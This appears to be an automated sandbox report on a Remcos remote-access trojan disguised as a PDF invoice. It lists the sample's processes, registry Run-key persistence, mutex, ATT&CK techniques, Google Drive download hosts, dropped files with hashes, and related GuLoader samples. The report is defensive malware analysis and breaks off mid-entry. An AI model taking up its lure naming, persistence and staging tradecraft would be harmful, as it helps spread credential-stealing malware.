Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Process created: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe"	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Process created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe"	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Process created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe"	Jump to behavior

Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe

Code function: 0_2_004034CE EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,DeleteFileA,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,

0_2_004034CE

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: 00000009.00000002.1673415355.00000000049E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ORIGINAL INVOICE COAU7230734290 pdf.bat.exe PID: 6128, type: MEMORYSTR

Remote Access Functionality

Detected Remcos RAT

Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe

Mutex created: \Sessions\1\BaseNamedObjects\Rmc-4U257D

Jump to behavior

Yara detected Remcos RAT

Source: Yara match	File source: 00000009.00000002.1673415355.00000000049E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ORIGINAL INVOICE COAU7230734290 pdf.bat.exe PID: 6128, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Native API	11 Registry Run Keys / Startup Folder	1 Access Token Manipulation	11 Masquerading	OS Credential Dumping	31 Security Software Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	11 Process Injection	1 Access Token Manipulation	LSASS Memory	2 File and Directory Discovery	Remote Desktop Protocol	1 Clipboard Data	1 Remote Access Software	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	11 Registry Run Keys / Startup Folder	11 Process Injection	Security Account Manager	23 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	1 DLL Side-Loading	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	13 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	23%	Virustotal		Browse
ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	22%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Link
C:\ProgramData\Remcos\remcos.exe	22%	ReversingLabs
C:\ProgramData\Remcos\remcos.exe	23%	Virustotal	Browse
C:\Users\user\AppData\Local\Temp\nsd1A26.tmp\System.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsd1A26.tmp\System.dll	5%	Virustotal	Browse
C:\Users\user\AppData\Local\Temp\nsg5579.tmp\System.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsg5579.tmp\System.dll	5%	Virustotal	Browse
C:\Users\user\AppData\Local\Temp\nsi4F73.tmp\System.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsi4F73.tmp\System.dll	5%	Virustotal	Browse
C:\Users\user\AppData\Local\Temp\nssA4F1.tmp\System.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nssA4F1.tmp\System.dll	5%	Virustotal	Browse

Name	IP	Active	Malicious	Antivirus Detection	Reputation
drive.google.com	142.250.185.78	true	false		high
drive.usercontent.google.com	142.250.185.225	true	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://www.google.com	ORIGINAL INVOICE COAU7230734290 pdf.bat.exe, 00000009.00000003.1592752203.0000000004A23000.00000004.00000020.00020000.00000000.sdmp	false	high
https://drive.usercontent.google.com/	ORIGINAL INVOICE COAU7230734290 pdf.bat.exe, 00000009.00000003.1631972221.0000000004A5A000.00000004.00000020.00020000.00000000.sdmp, ORIGINAL INVOICE COAU7230734290 pdf.bat.exe, 00000009.00000003.1652528178.0000000004A5A000.00000004.00000020.00020000.00000000.sdmp, ORIGINAL INVOICE COAU7230734290 pdf.bat.exe, 00000009.00000002.1673415355.0000000004A23000.00000004.00000020.00020000.00000000.sdmp	false	high
https://drive.usercontent.google.com/f)	ORIGINAL INVOICE COAU7230734290 pdf.bat.exe, 00000009.00000003.1631972221.0000000004A5A000.00000004.00000020.00020000.00000000.sdmp, ORIGINAL INVOICE COAU7230734290 pdf.bat.exe, 00000009.00000003.1652528178.0000000004A5A000.00000004.00000020.00020000.00000000.sdmp, ORIGINAL INVOICE COAU7230734290 pdf.bat.exe, 00000009.00000002.1673415355.0000000004A23000.00000004.00000020.00020000.00000000.sdmp	false	high
https://drive.google.com/k	ORIGINAL INVOICE COAU7230734290 pdf.bat.exe, 00000009.00000002.1673415355.00000000049A8000.00000004.00000020.00020000.00000000.sdmp	false	high
http://nsis.sf.net/NSIS_Error	remcos.exe, remcos.exe, 0000000E.00000002.2793249084.0000000000408000.00000002.00000001.01000000.0000000C.sdmp, remcos.exe, 0000000E.00000000.2007675389.0000000000408000.00000002.00000001.01000000.0000000C.sdmp, remcos.exe, 0000000F.00000002.2793047460.0000000000408000.00000002.00000001.01000000.0000000C.sdmp, remcos.exe, 0000000F.00000000.2256528109.0000000000408000.00000002.00000001.01000000.0000000C.sdmp, ORIGINAL INVOICE COAU7230734290 pdf.bat.exe, remcos.exe.9.dr	false	high
https://apis.google.com	ORIGINAL INVOICE COAU7230734290 pdf.bat.exe, 00000009.00000003.1592752203.0000000004A23000.00000004.00000020.00020000.00000000.sdmp	false	high
http://nsis.sf.net/NSIS_Error...	ORIGINAL INVOICE COAU7230734290 pdf.bat.exe, remcos.exe.9.dr	false	high
https://drive.google.com/S	ORIGINAL INVOICE COAU7230734290 pdf.bat.exe, 00000009.00000002.1673415355.00000000049A8000.00000004.00000020.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
142.250.185.78	drive.google.com	United States		15169	GOOGLEUS	false
142.250.185.225	drive.usercontent.google.com	United States		15169	GOOGLEUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1640058
Start date and time:	2025-03-16 22:27:19 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 37s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	ORIGINAL INVOICE COAU7230734290 pdf.bat.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@9/13@4/2
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 88% Number of executed functions: 78 Number of non-executed functions: 78
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 23.60.203.209, 172.202.163.200
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target ORIGINAL INVOICE COAU7230734290 pdf.bat.exe, PID 6128 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
21:29:10	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Rmc-4U257D "C:\ProgramData\Remcos\remcos.exe"
21:29:20	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Rmc-4U257D "C:\ProgramData\Remcos\remcos.exe"
21:29:30	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Rmc-4U257D "C:\ProgramData\Remcos\remcos.exe"

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	facebookpro.exe	Get hash	malicious	Sality	Browse	142.250.185.78 142.250.185.225
	FNLJD8Q3.exe	Get hash	malicious	Vidar	Browse	142.250.185.78 142.250.185.225
	Fx_958689.lNk.lnk	Get hash	malicious	Unknown	Browse	142.250.185.78 142.250.185.225
	2PFebPN0qK.exe	Get hash	malicious	Latrodectus, LummaC Stealer	Browse	142.250.185.78 142.250.185.225
	winscp.exe	Get hash	malicious	CobaltStrike	Browse	142.250.185.78 142.250.185.225
	winscp.exe	Get hash	malicious	CobaltStrike	Browse	142.250.185.78 142.250.185.225
	Gokod.763652.06.exe	Get hash	malicious	Unknown	Browse	142.250.185.78 142.250.185.225
	SecuriteInfo.com.Trojan.Win64.Agent.30981.30321.exe	Get hash	malicious	Unknown	Browse	142.250.185.78 142.250.185.225
	SecuriteInfo.com.Win32.PWSX-gen.25337.28224.exe	Get hash	malicious	Unknown	Browse	142.250.185.78 142.250.185.225
	SecuriteInfo.com.Win32.RATX-gen.20425.5895.exe	Get hash	malicious	Unknown	Browse	142.250.185.78 142.250.185.225

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nsg5579.tmp\System.dll	Teklif Talebi.exe	Get hash	malicious	GuLoader	Browse
	Estado de cuenta y facturas..exe	Get hash	malicious	GuLoader	Browse
	fatura.exe	Get hash	malicious	GuLoader	Browse
	Teklif Talebi.exe	Get hash	malicious	GuLoader	Browse
	fatura.exe	Get hash	malicious	GuLoader	Browse
	Estado de cuenta y facturas..exe	Get hash	malicious	GuLoader	Browse
	SAMPLE _CATALOGUE_EWF_PDF.bat.exe	Get hash	malicious	FormBook, GuLoader	Browse
	SAMPLE _CATALOGUE_EWF_PDF.bat.exe	Get hash	malicious	GuLoader	Browse
	rSAMPLE_CATALOGUE_EWF_PDF.scr.exe	Get hash	malicious	GuLoader	Browse
	rSAMPLE_CATALOGUE_EWF_PDF.scr.exe	Get hash	malicious	GuLoader	Browse
C:\Users\user\AppData\Local\Temp\nsd1A26.tmp\System.dll	Teklif Talebi.exe	Get hash	malicious	GuLoader	Browse
	Estado de cuenta y facturas..exe	Get hash	malicious	GuLoader	Browse
	fatura.exe	Get hash	malicious	GuLoader	Browse
	Teklif Talebi.exe	Get hash	malicious	GuLoader	Browse
	fatura.exe	Get hash	malicious	GuLoader	Browse
	Estado de cuenta y facturas..exe	Get hash	malicious	GuLoader	Browse
	SAMPLE _CATALOGUE_EWF_PDF.bat.exe	Get hash	malicious	FormBook, GuLoader	Browse
	SAMPLE _CATALOGUE_EWF_PDF.bat.exe	Get hash	malicious	GuLoader	Browse
	rSAMPLE_CATALOGUE_EWF_PDF.scr.exe	Get hash	malicious	GuLoader	Browse
	rSAMPLE_CATALOGUE_EWF_PDF.scr.exe	Get hash	malicious	GuLoader	Browse

Created / dropped Files

C:\ProgramData\Remcos\remcos.exe

Download File

Process:	C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	415061
Entropy (8bit):	7.952851019257241
Encrypted:	false
SSDEEP:	12288:hNprgpRdrXgKaKytbPPrKIKjWcQraWFCMnq:XprgrXgKiPPuIiQraWJq
MD5:	9117FE086DE9BB304D000560408106E5
SHA1:	A5AF5ED15A0E7F96CEBA428A1BF3822D81A95F6F
SHA-256:	2DCE3C887B0B2F9BB9F433C429924DBB8B05BC67318AD05B3A739151D67E363D
SHA-512:	169758D2F9228133F1E468F28BED6D74A8259B5FB5DE9C2DB6DF58C52A2AE008AE4864794E38E6D493155894DABF46174BF52D29D10E39F62F882D93FB0884EA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 22% Antivirus: Virustotal, Detection: 23%, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........>...P..P..P...T..P...V..P...Q..P..Q.+.P.I.T..P.I...P.I.R..P.Rich..P.........................PE..L.....*c.................j....9......4............@...........................;...........@..........................................p;.8............................................................................................................text....h.......j.................. ..`.rdata...............n..............@..@.data... .9.........................@....ndata...@...0:..........................rsrc...8....p;.....................@..@................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Remcos\remcos.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\gennemgangs\Hokuspokus\Bombardementernes.Mon220

Download File

Process:	C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe
File Type:	data
Category:	dropped
Size (bytes):	17499
Entropy (8bit):	4.497451962446796
Encrypted:	false
SSDEEP:	384:wtceHN3crbxyLFYKl9/zw0ZdgKF6lIcEmP/mL:qtcyLuKleW69l30
MD5:	3C79277AD7BEEC418CD65219D0668BE1
SHA1:	61F680EB431D4CC8304D20FE5207ED7C3E5112CD
SHA-256:	B2CD0E235F27A28AE18608167EE6ABE0764AC194FE3FDA96C5224C72EC71DFA2
SHA-512:	6BDB57C09BA1C926357E0A9F582F66DBBAE5B0146E1B1D7DAAB11D8069915F70FC2AD176247A59E74379710E7F78323741B7386D3A3BD987209165CABC1E2BC3
Malicious:	false
Reputation:	low
Preview:	.......................II.......J...).h.........ddd..............^^^.4...x.............Y.6....................}.......??????.HH..........yy...........................Q.!.................;;...~............8.......................!.w.............UU..l.....11..e........................N..................fff.......LLLL.w....................DDDD..7....===.........NN......O.....................gg................T..:.......4..""".........SSS....&...........................;;.......................1...................iiiiii........=.............11...6............\|................RR..RR...................<<<....................................J...666.......................AAA....,....8...?..'''.......(.....k.T.>>...........\|\|\|....V............PP..........................4...................>>............g......................jj.PP...........``.......JJJ..UUUU................................-.11111.C.....tt............+++++++......22.........\|\|\|.............\|..........~~~.......................

C:\Users\user\AppData\Local\Temp\gennemgangs\Hokuspokus\Hndernes.noc

Download File

Process:	C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe
File Type:	data
Category:	dropped
Size (bytes):	245698
Entropy (8bit):	1.2508578829052677
Encrypted:	false
SSDEEP:	768:oS5NgJ6rqH3KhaJ/+th4dIRn1XPKRpvyBoCQKrXtb3zAL//yr2O95D6MFmxpua5f:m5wYYzDA0Z9G82
MD5:	18991826DE7ECDF65844DD2A156FA2A1
SHA1:	C953F733B61A65841A985499657863E6BF8C7A06
SHA-256:	8EFF9F53B1581A6D0F0C81CFCE3AF0A95FAB8ABDFBACAB1BC1D238E853152081
SHA-512:	A5C8F456B17508EACCC264BE1C6933521EE397B8EA9766728ADAA62F13F8BB14795FC14ABDA452F7887D1A45555EEE68790827B591B13A9046D54DBD6225AFFE
Malicious:	false
Reputation:	low
Preview:	.....................................................................7.....@.......t.....................2................x................................................................L..................3...............m.................9...&.......x.....................................................................................3...............................................7...W............................................................S.........................G......................k................,...........................................G......l...........................................................6.............................d.,.....r...1.........p...........e......QN.................+.....................S......................................./...........sH..........................9............................9.....N...........C..\|...h........D.......-.................................................................S..................f......................

C:\Users\user\AppData\Local\Temp\gennemgangs\Hokuspokus\Overhalingens.Rst147

Download File

Process:	C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe
File Type:	data
Category:	dropped
Size (bytes):	283473
Entropy (8bit):	7.722388529873159
Encrypted:	false
SSDEEP:	6144:vbfhK/IjMdkQ/NImj5LntKIwPmQW8QnWn+Qjga1WeL03PkH:jfMapQ/dLjwe73+8ao3Y
MD5:	3BA0C8DEC0A7223CAB75241C9CAA5F62
SHA1:	949E517B692378B13B104F16644866AF6D66FF35
SHA-256:	AD9D3BD12AFF7D2E216418B417D89E68FB1E14957E00AFC41DB8A510D7529FFD
SHA-512:	A582F9937CBBB857D338733540468564CC5034982F47746E6E82001BA1211EF4D75EF2F2190266B7416249D21D482410A3D44C0DB16517812059DFDB3AE16AEF
Malicious:	false
Reputation:	low
Preview:	.&&............^..=......\.................4......&&...................A..................... ...)......@..........D.zzz..................................L.........y...........999...&&&&..........DDDD....M....4.........//............dddd................\|...............d.....................uu...b.pp............).}.++..R....[[[[................KKKK......................6.....................Y...5.............+................0...!!..........tt............\.;;....OOO.....'...................A... .......P......s.....**..q.................vv..VVVV...".AAAAA.......z......!!!!...===.........UU.0......DD..............................j........ii.........5....y.....BBB...J........,,,,......&.~~~~~........_............vvv..)).....J.......FFF...............n.....................................................)...............\|.....?....555............q.............QQ............L...................R...........pp.......zzzz.DD...........ddd........................!!!.<.......................

C:\Users\user\AppData\Local\Temp\gennemgangs\Hokuspokus\meniscate.jpg

Download File

Process:	C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 141x234, components 3
Category:	dropped
Size (bytes):	1773
Entropy (8bit):	7.147051707360143
Encrypted:	false
SSDEEP:	24:D9YMW0o0XxDuLHeOWXG4OZ7DAJuLHenX3dgp2LavwVKGgxl2ewOVEIgrrme:D9YM+uERAT4woGIl26EIgue
MD5:	8E297E13ECB488420ECC75BF5C1D8D23
SHA1:	B1A360C27719B3DA76CB29DE9B17B404BF8A5D8E
SHA-256:	D32D8D364880DF96235EFB3FD6866654989439EC18F9429EB9EA23E22B8CFCBD
SHA-512:	D936BBF60C775774FB3B9CC872A56AF9B68C4A470A2986D3476A9A2B9BBABD4EBC463CDB5E6D57D5AE92E5F105D9DCD2DFC012C630CC642067B0E732CEE41353
Malicious:	false
Reputation:	low
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...)s.....<t..%..QE..QE..QE..QE..QE..QE..QE..(...(...(...(....Q@..Q@..Q@..Q@..Q@..\|qI+m...........7...R....P...(.M._.!....G.x....uea.0..).[0q...E%-Q!E.P.E.P0..(...(...(.QE.....$}+WG.t..H_.8....k(.1..4.-.......[g.9..X....#8.\.._f.oA>ugc2..V....{.C19.

C:\Users\user\AppData\Local\Temp\gennemgangs\Hokuspokus\sulfonamid.red

Download File

Process:	C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe
File Type:	data
Category:	dropped
Size (bytes):	75702
Entropy (8bit):	1.2491649926400743
Encrypted:	false
SSDEEP:	384:ODelzuor7VcLh6ftmXlkttKJHzESY2kykE+mYEEKxtQWCpf4Qm/Cismw3x4tAP3A:ODMpAfMmYEXXCpf4XaitQ4tBtpM/koyV
MD5:	0308C9E0B89C665A9C5443F1084AFB7A
SHA1:	2BCD7F6DE70A575297234CC29816A428C5FAC0DE
SHA-256:	49BD512090BB6AA9C79BF0DDCAAC2879D7E7D27D38A1C2C74DA0E2B65F581B3E
SHA-512:	4BD6682FE86F30F5C2B26166D90772FB4FA759E1F9FDAA3DFD1410E2F0E3BC8578517DBDA3EBC0BC64E21985DCEE1599FCE768A2E42E859AEA6BB198EDC6BE74
Malicious:	false
Reputation:	low
Preview:	..............."................*.....`..........................Y.....................................+...>.S.....................u..................................d.............~......................................................................e....n.........................................{....................L.................................................... .................................................(.........................................x...................................................y.....;.........................6................?...................................I.................9..............s........................................0.................................................{........................ .............................................................,......................................H...........................].. ..................................4..............?.9..........W...........................m[........................

C:\Users\user\AppData\Local\Temp\gennemgangs\Hokuspokus\udskilningslbs.skr

Download File

Process:	C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe
File Type:	FoxPro FPT, blocks size 20736, next free block index 244, field type 0
Category:	dropped
Size (bytes):	253955
Entropy (8bit):	1.245305635284123
Encrypted:	false
SSDEEP:	768:6sHZ+/q4v97+j/rat0DkLjTCMP/lLp7TWprvhXVWBbgV4T6+dC2FlOZSqKFqwZdY:6s5aFDNWtotLx5h47F
MD5:	A4AAF4C3575B9A390A1797AF9BAE51F5
SHA1:	FAD75B95F3C48A56D932EF5F6AE36E9BD155C38A
SHA-256:	75D169C82B436E4DDA10D0B79BB75579C67216FC34E70B5BC6E140BB17CA16C5
SHA-512:	7F7EC88A2397B03D47A7CA045DB4B482821246AE48BCA055DF8B4FCD4288F7A2A3E3448AAC7C01C284C9DA657B6E844BD8AA737A839DABB2CBEAB3D8746EC3F1
Malicious:	false
Preview:	......Q..................v..................................%...................'........................................................3..........{.....................\|..............S.............................................A..........p......................1........4....................................R................................................................w....................+.....7............................9........................................N..............................................\.................................(........................?..............Q...............................T...............................................................................................................................................................................Z...................................................................f.............................B..............2....................................................................................

C:\Users\user\AppData\Local\Temp\gennemgangs\Hokuspokus\unentreating.txt

Download File

Process:	C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	522
Entropy (8bit):	4.265615340850149
Encrypted:	false
SSDEEP:	12:oyFjnUpz5xm51vAbeE2AgQKyfktP4Qubc9vbM+m1swNvv:GTgw2AIycWsvb2swZ
MD5:	1E57BC5435C654C418C08AD821695153
SHA1:	205BFFBECC1E50B74564693A29B2035921FA9B90
SHA-256:	654EA64081B8DBAE68D3AFD0AEFEB61D880C477697F9E7BACDA9CBBE77A89CA1
SHA-512:	697A637BE54B053DBCA650780D7D09A91E259DBCE12CB1B81B9939ED57426AD470F5833D31542E1B0B3D11F1A3AB0EDC4538E1BCC8AA0DD9756CD183D0FF6A5B
Malicious:	false
Preview:	Subperiosteally thisness sheeplike,battered retsprsidents seksualklinikker rdsprngte..Fnis ondets baglokaler serviceydelser jocular,svrvgtsklassen eftertrykkeliges toaarsbarnets noncomprehensiveness steatosis snkekasse........odette skarprettere markedsoplysningens vaerker kyars dispossession,forvoldte nasaump mooching restabled gardinstangs intervenant civilingenirers..;spisekortets privatejets fst zenits goldlike bridgebordenes millionsens.Heily tunika insolvenserklring lincoln mejetrskes sarcosepta pseudocarpous..

C:\Users\user\AppData\Local\Temp\nsd1A26.tmp\System.dll

Download File

Process:	C:\ProgramData\Remcos\remcos.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11776
Entropy (8bit):	6.0240444215389255
Encrypted:	false
SSDEEP:	192:Q9rQDenC9VrcK7REgSWOprANupQYLRszDDH/d9CWlXo7U6Wxf:QJQEaVAK7R9SfpjpQYLRszfH/d9CWB1j
MD5:	10E8921A6E7F6A74671B07DC3BDE626F
SHA1:	B7961066600EF193C5319DBEED3673DC60110A50
SHA-256:	C85142F86E1EC02F7EF8D5BA31B22031DE3DE9A16BCE519D5482B824AFB277EB
SHA-512:	4C19A7E3117BAEEC3F6A7F9A33CFAB392255741137406DB87FE5AC24DEF7F9A28B2ED0FC26F0F46C5D43BA1BB6675DEA74410A797BFD265E38812B042460AA00
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 5%, Browse
Joe Sandbox View:	Filename: Teklif Talebi.exe, Detection: malicious, Browse Filename: Estado de cuenta y facturas..exe, Detection: malicious, Browse Filename: fatura.exe, Detection: malicious, Browse Filename: Teklif Talebi.exe, Detection: malicious, Browse Filename: fatura.exe, Detection: malicious, Browse Filename: Estado de cuenta y facturas..exe, Detection: malicious, Browse Filename: SAMPLE _CATALOGUE_EWF_PDF.bat.exe, Detection: malicious, Browse Filename: SAMPLE _CATALOGUE_EWF_PDF.bat.exe, Detection: malicious, Browse Filename: rSAMPLE_CATALOGUE_EWF_PDF.scr.exe, Detection: malicious, Browse Filename: rSAMPLE_CATALOGUE_EWF_PDF.scr.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@t.U!..U!..U!...T..R!...Y..R!..U!..F!...T..Q!...T..T!...T..T!...T..T!..RichU!..................PE..L.....c.........."!....."...................@...............................p............@..........................@.......A..P............................`.......................................................@..X............................text...+!.......".................. ..`.rdata.......@.......&..............@..@.data...D....P.....................@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsg5579.tmp\System.dll

Download File

Process:	C:\ProgramData\Remcos\remcos.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11776
Entropy (8bit):	6.0240444215389255
Encrypted:	false
SSDEEP:	192:Q9rQDenC9VrcK7REgSWOprANupQYLRszDDH/d9CWlXo7U6Wxf:QJQEaVAK7R9SfpjpQYLRszfH/d9CWB1j
MD5:	10E8921A6E7F6A74671B07DC3BDE626F
SHA1:	B7961066600EF193C5319DBEED3673DC60110A50
SHA-256:	C85142F86E1EC02F7EF8D5BA31B22031DE3DE9A16BCE519D5482B824AFB277EB
SHA-512:	4C19A7E3117BAEEC3F6A7F9A33CFAB392255741137406DB87FE5AC24DEF7F9A28B2ED0FC26F0F46C5D43BA1BB6675DEA74410A797BFD265E38812B042460AA00
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 5%, Browse
Joe Sandbox View:	Filename: Teklif Talebi.exe, Detection: malicious, Browse Filename: Estado de cuenta y facturas..exe, Detection: malicious, Browse Filename: fatura.exe, Detection: malicious, Browse Filename: Teklif Talebi.exe, Detection: malicious, Browse Filename: fatura.exe, Detection: malicious, Browse Filename: Estado de cuenta y facturas..exe, Detection: malicious, Browse Filename: SAMPLE _CATALOGUE_EWF_PDF.bat.exe, Detection: malicious, Browse Filename: SAMPLE _CATALOGUE_EWF_PDF.bat.exe, Detection: malicious, Browse Filename: rSAMPLE_CATALOGUE_EWF_PDF.scr.exe, Detection: malicious, Browse Filename: rSAMPLE_CATALOGUE_EWF_PDF.scr.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@t.U!..U!..U!...T..R!...Y..R!..U!..F!...T..Q!...T..T!...T..T!...T..T!..RichU!..................PE..L.....c.........."!....."...................@...............................p............@..........................@.......A..P............................`.......................................................@..X............................text...+!.......".................. ..`.rdata.......@.......&..............@..@.data...D....P.....................@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsi4F73.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe
